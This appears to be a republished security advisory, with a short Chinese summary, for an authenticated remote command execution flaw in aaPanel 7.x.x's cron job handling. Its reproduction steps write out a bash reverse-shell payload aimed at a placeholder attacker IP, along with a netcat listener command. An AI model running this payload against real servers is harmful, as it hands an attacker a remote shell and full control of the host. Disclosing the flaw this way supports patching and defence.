aaPanel 7.x.x Remote Command Execution
aaPanel 7.x.x 存在远程命令执行漏洞(CVSS 9 分),允许攻击者通过操控 cron 作业注入并执行任意命令,完全控制服务器系统。 2025-9-21 17:29:8 Author: cxsecurity.com(查看原文) 阅读量:4 收藏

aaPanel 7.x.x Remote Command Execution

CVSS Base Score: 9/10

Impact Subscore: 10/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

This is authenticated RCE. Vulnerability Description During my testing/evaluation of aaPanel, I identified a flaw in how cron jobs are handled, which enables an attacker to inject and execute arbitrary commands remotely. Specifically: - An authenticated user can manipulate cron job entries in a way that breaks out of the software to the server. - This leads to the execution of malicious code on the server hosting aaPanel, potentially compromising the entire system. Steps to Reproduce 1. Log in to the aaPanel dashboard 2. Create a new cron job with the payload: bash -c "bash -i >& /dev/tcp/XXXX/1234 0>&1" (XXXX is your ip) 3. Save the cron job and trigger it (or wait for the scheduled execution). Start a listener on the other side to receive: nc -lvnp 1234 4. Observe the execution of the injected command on the server and RCE. Many thanks, Alasdair Gorniak/Hamed Kohi



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025090010
如有侵权请联系:admin#unsafe.sh